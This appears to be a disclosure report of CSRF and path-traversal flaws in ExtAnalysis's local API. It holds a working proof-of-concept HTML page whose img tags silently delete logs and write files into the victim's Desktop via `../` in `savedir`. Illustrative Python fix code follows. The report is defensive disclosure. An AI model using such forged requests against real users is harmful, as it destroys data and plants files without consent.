The ExtAnalysis project is vulnerable to several cross-site request forgery (CSRF) issues. Its local API at 127.0.0.1:13337 accepts state-changing requests over plain GET without any CSRF token, so a web page the victim merely visits can trigger loss of functionality (for example deleting all logs) and, because the `savedir` parameter is not validated against `../` traversal, place downloaded files in arbitrary directories without the victim's knowledge.
With ExtAnalysis running (started with the `python2 extanalysis.py` command), the following proof-of-concept page triggers both issues:
<html>
<!-- Downloads the Gmass extension into the victim's `Desktop` folder via `../` traversal in `savedir`. Fix: reject `../` in `savedir` and require a CSRF token -->
<img
src="http://127.0.0.1:13337/api/?query=dlanalysis&extid=ehomdgjhgmbidokdgicgmdiedadncbgf&savedir=../../../Desktop/hacked"
/>
<!-- Deletes all the logs without the victim's knowledge. Fix: require a CSRF token -->
<img src="http://127.0.0.1:13337/api/?query=deleteAll" />
</html>
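The two fixes noted in the proof of concept, a CSRF token on state-changing API calls and confinement of `savedir` to a fixed directory, are shown below as an added example. This is illustrative code written for this report, not ExtAnalysis's own handler: the function names, the `X-CSRF-Token` header, the session dictionary and the `/tmp/extanalysis_root` base directory are all assumptions. The handler keeps the two query names from the report (`deleteAll`, `dlanalysis`) and returns an HTTP-style status so the behaviour can be checked.

```python
import hmac
import secrets
from pathlib import Path
from typing import Optional, Tuple

# Hypothetical base directory under which all downloads must stay (constructed value).
ANALYSIS_ROOT = Path("/tmp/extanalysis_root")


def issue_csrf_token(session: dict) -> str:
    """Mint an unguessable per-session token and store it server-side.

    A page served by the tool embeds this token; a third-party page that
    forges a request cannot read it, which is what defeats CSRF.
    """
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def csrf_token_valid(session: dict, presented: Optional[str]) -> bool:
    """Constant-time comparison of the presented token with the session's token."""
    expected = session.get("csrf_token")
    if not expected or not presented:
        return False
    return hmac.compare_digest(expected, presented)


def resolve_savedir(root: Path, savedir: str) -> Optional[Path]:
    """Resolve the requested save directory and refuse anything outside root.

    Joining then resolving collapses `..` segments, and an absolute savedir
    replaces root entirely, so the final relative_to check is what matters.
    """
    root_resolved = root.resolve()
    candidate = (root / savedir).resolve()
    try:
        candidate.relative_to(root_resolved)
    except ValueError:
        return None  # escaped the analysis root (e.g. ../../../Desktop)
    return candidate


def handle_api(session: dict, method: str, params: dict, headers: dict) -> Tuple[int, str]:
    """Hardened handler for the two endpoints named in the report.

    Returns (status, message). State-changing queries must be POSTed with a
    valid CSRF token, which an <img src=...> request can never satisfy.
    """
    if method != "POST":
        return 405, "state-changing queries must use POST"
    if not csrf_token_valid(session, headers.get("X-CSRF-Token")):
        return 403, "missing or invalid CSRF token"

    query = params.get("query")
    if query == "deleteAll":
        return 200, "logs deleted"
    if query == "dlanalysis":
        target = resolve_savedir(ANALYSIS_ROOT, params.get("savedir", ""))
        if target is None:
            return 400, "savedir escapes the analysis root"
        return 200, "would save analysis to %s" % target
    return 404, "unknown query"
```

The handler is meant to be called with whatever the web framework supplies for the session, method, query parameters and headers; the important property is that the forged `GET /api/?query=deleteAll` and the traversal `savedir` from the proof of concept are both rejected, while a same-origin POST carrying the session's token and a relative `savedir` succeeds.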